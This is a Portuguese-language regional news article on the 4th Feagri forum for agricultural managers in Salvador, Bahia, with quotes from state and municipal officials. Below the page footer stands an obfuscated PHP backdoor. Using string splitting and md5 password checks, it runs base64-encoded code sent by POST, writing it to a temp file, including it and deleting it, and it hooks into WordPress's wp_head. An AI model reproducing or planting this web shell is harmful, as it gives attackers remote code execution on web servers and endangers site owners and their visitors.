• SEJA BEM-VINDO

Fórum discute temas estratégicos para o setor rural da Bahia

Publicado em: 22/05/2024 Atualizado:: maio 22, 2024

Gestores municipais, técnicos, produtores rurais, especialistas e demais profissionais do setor agropecuário estarão reunidos até quinta-feira (23) no 4º Fórum Estadual de Gestores da Agricultura, Pecuária, Irrigação, Pesca e Aquicultura da Bahia (Feagri). O evento ocorre no Centro de Convenções Salvador, no bairro Boca do Rio. A intenção é discutir temas estratégicos, com foco no desenvolvimento do agronegócio baiano.

A programação, aberta oficialmente nesta quarta (22), conta com plenárias abordando assuntos como a conjuntura da agropecuária da Bahia e a sustentabilidade no campo, lançamentos inovadores e uma reunião exclusiva para gestores municipais. Também fazem parte do fórum palestras, workshop com especialistas e painéis de debates.

Para o secretário da estadual da Agricultura, Wallison Torres, eventos como este têm grande significado, por aprofundar temas estratégicos para o setor. “É um encontro que envolve todos os secretários de agricultura do estado para a gente dialogar e juntos construirmos uma Bahia com a vocação real de cada município”. Outro ponto destacado por ele foi o investimento do governo baiano no setor produtivo. “Os investimentos da Bahia estão cada vez mais pujantes. Nós tivemos o maior plano safra da história do Brasil com esse governo. A Bahia tem o potencial de se tornar, de se consolidar ainda mais na agricultura familiar e no agronegócio. Então, nós somos o estado com o maior potencial no agronegócio do Brasil”.

O secretário-geral do Feagri, Thiago Guedes, explica que o fórum é um espaço para estreitar as relações entre estado, União e municípios. “Esse é um grande momento de troca de saberes, de uma ampla discussão, de debate, de informações e de articulação dos gestores municipais, sendo capacitados, fomentados, orientados em diversas temáticas do setor produtivo”.

Os organizadores estimam que 500 pessoas passem pelo local, aprofundando os conhecimentos em áreas como captação de recursos, gestão e política pública, produção agropecuária municipal, indicação geográfica e marcas coletivas, inspeção de produtos de origem agropecuária, certificação e produção orgânica, pagamento por serviços ambientais, tecnologias do plano de agricultura de baixo carbono, defesa sanitária vegetal, sistema unificado estadual de sanidade agroindustrial familiar, artesanal e de pequeno porte, além de defesa sanitária animal.

Moisés Bohana é secretário de Agricultura de Ilhéus e marcou presença no fórum. Ele comentou a importância de conhecer temas que promovam o desenvolvimento do setor. “Ilhéus está sempre participando desses eventos, porque está somando para toda a região positivamente, buscando cada vez mais informações, aperfeiçoando, trocando ideias, discutindo inclusive com outros secretários, outros gestores da Bahia inteira e vai levar isso tudo para que seja implantado e seja acrescentado no que já vem sendo feito na região de Ilhéus”.

O superintendente de agricultura familiar da Secretaria de Desenvolvimento Rural, Mazinho Carneiro, falou da relação de proximidade entre a agricultura familiar e a convencional, com troca de informações e tecnologias. “Nós temos uma relação muito importante com a Agência de Defesa Agropecuária da Bahia (Adab), que é a relação das análises de solo, correções, mas aqui a gente trouxe também trocas de informações. Nós estamos investindo muito nos maquinários adaptados à agricultura familiar e, além dessa tecnologia de maquinários, a gente também tem tecnologias sociais pra o povo do rural baiano se desenvolver”.

Informações

Outras informações podem ser consultadas no site http://www.seagri.ba.gov.br/, pelo telefone (71) 3115-2808 e ainda pelo e-mail: feagri@seagriba.gov.br

 

…………………..

 

Fonte: Anderson Oliveira/GOVBA


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}